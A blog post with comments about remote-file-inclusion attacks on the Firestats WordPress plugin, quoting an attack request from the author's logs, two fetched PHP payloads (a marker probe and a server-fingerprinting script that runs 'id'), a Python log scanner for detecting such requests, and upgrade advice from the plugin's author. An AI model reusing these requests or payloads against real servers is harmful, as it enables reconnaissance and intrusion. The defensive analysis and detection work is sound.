Firestats WordPress Exploit
The vulnerability described below has been resolved in Firestats 1.6.2, which you can download from http://firestats.cc/wiki/Download
Disclaimer: I have nothing at all to do with the development of Firestats. I am merely an end user.
Over the last few hours I have been watching a major attempt at cracking both of my WordPress installations. A quick investigation tells me that the cracking attempts are looking for this vulnerability in Firestats.
At present there have been over 600 attempts from servers all over the globe, each requesting the path to firestats-wordpress.php and trying to exploit it by passing the URL of a script hosted elsewhere.
A sample from my logs looks like this:
http://tech.sweetnam.eu/tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt??
The scripts themselves seem to come in two versions. The most common one, the one referenced in the request above, has the following contents:
<?php
// Probe only: prints a fixed marker and stops, so the scanner can tell from the
// response body whether the remote include actually executed.
/* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */
?>
The other one contains the following:
<?php
// Second payload: a server-fingerprinting script. Once included by the
// vulnerable plugin it runs with the web server's privileges and prints
// OS, user and disk-usage details back to whoever requested the page.
function ConvertBytes($number) {
    // Chooses the unit from the digit count of the number, not its magnitude.
    $len = strlen($number);
    if ($len < 4) {
        return sprintf("%d b", $number);
    }
    if ($len >= 4 && $len <= 6) {
        return sprintf("%0.2f Kb", $number/1024);
    }
    if ($len >= 7 && $len <= 9) {
        return sprintf("%0.2f Mb", $number/1024/1024);
    }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "Osirys<br>";
$un = @php_uname();
// Bare "id" is an undefined constant; older PHP treats it as the string 'id'
// (with a notice) and so still runs the id command.
$id1 = system(id);
$pwd1 = @getcwd();
$free1 = diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1 = disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1 - $free1);
$os = @PHP_OS;
echo "0sirys was here and also is a fucking gay..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
All I can recommend at the moment is removing Firestats from your WordPress installation; it seems to be the only way to be sure.
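For anyone checking their own access logs for this traffic, here is an added example (not code from this post or from Firestats) that scans Apache combined-format log lines for requests whose query parameters carry an absolute URL on a foreign host, the pattern in the log sample above. The log lines embedded in it are constructed: the client addresses and payload.example are placeholders, and it assumes tech.sweetnam.eu is the site's own hostname.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: client ip, timestamp, quoted request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}

# Constructed sample lines (not real traffic): two RFI probes, one legitimate
# relative include path, and one URL-looking value that points at our own host.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jul/2008:14:02:11 +0000] "GET /tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 200 512 "-" "libwww-perl/5.808"
198.51.100.23 - - [10/Jul/2008:14:05:42 +0000] "GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http%3A%2F%2Fpayload.example%2Fshell.txt%3F HTTP/1.0" 200 4096 "-" "Mozilla/4.0"
192.0.2.5 - - [10/Jul/2008:14:06:01 +0000] "GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=/wp-content/plugins/firestats/js/firestats.js HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Jul/2008:14:07:30 +0000] "GET /?s=http://tech.sweetnam.eu/about HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
""".splitlines()

def rfi_indicators(request_path, own_host):
    """(param, url) for each query value that is an absolute URL on a foreign host."""
    hits = []
    # parse_qs already undoes percent-encoding such as http%3A%2F%2F.
    for name, values in parse_qs(urlsplit(request_path).query, keep_blank_values=True).items():
        for value in values:
            target = urlsplit(value)
            if target.scheme in REMOTE_SCHEMES and target.netloc and target.netloc != own_host:
                hits.append((name, value))
    return hits

def scan_log(lines, own_host):
    """One finding per request carrying a remote-URL parameter; malformed lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        script = urlsplit(m["path"]).path.rsplit("/", 1)[-1]   # e.g. firestats-wordpress.php
        for param, url in rfi_indicators(m["path"], own_host):
            findings.append({"ip": m["ip"], "script": script, "param": param,
                             "remote_host": urlsplit(url).netloc, "status": int(m["status"])})
    return findings

def summarize(findings):
    """Attempts, distinct source servers, and distinct hosts the payloads are fetched from."""
    return {"attempts": len(findings),
            "source_ips": len({f["ip"] for f in findings}),
            "payload_hosts": len({f["remote_host"] for f in findings})}

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG, "tech.sweetnam.eu")
    print(found, summarize(found))
```

Run it against a real access log with `scan_log(open(path), "your.host")`; the foreign-host check keeps links to your own site out of the findings, and values without a URL scheme are never flagged.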
Hi,
Generally it would have been nice if you or someone else had notified me of the vulnerability; I can't always catch web chatter.
First of all, if your server is configured to allow remote file inclusion, you would be wise to disable it. It's not a good idea and no modern PHP program should depend on it.
Regardless, please upgrade to FireStats 1.6.2, which addresses this issue and a few others.
Hi Omry,
My apologies for not notifying you. I have updated the post with a link to the updated version of Firestats.
Thank you for taking the time to leave a comment and thank you for creating such a great piece of software.
Hi Robert,
You're welcome, and thanks for updating the post.
Hi Robert, though with a 2-year delay, I should note the vulnerability you're describing (following an RFI into a server), and therefore via a hacker server, is actually a hack attack. The second script (the one with "0sirys was here...") is actually dangerous!
There's an explanation added at http://www.ipfraudreporter.com/217-26-112-1-ip-address#comment-635
Best regards!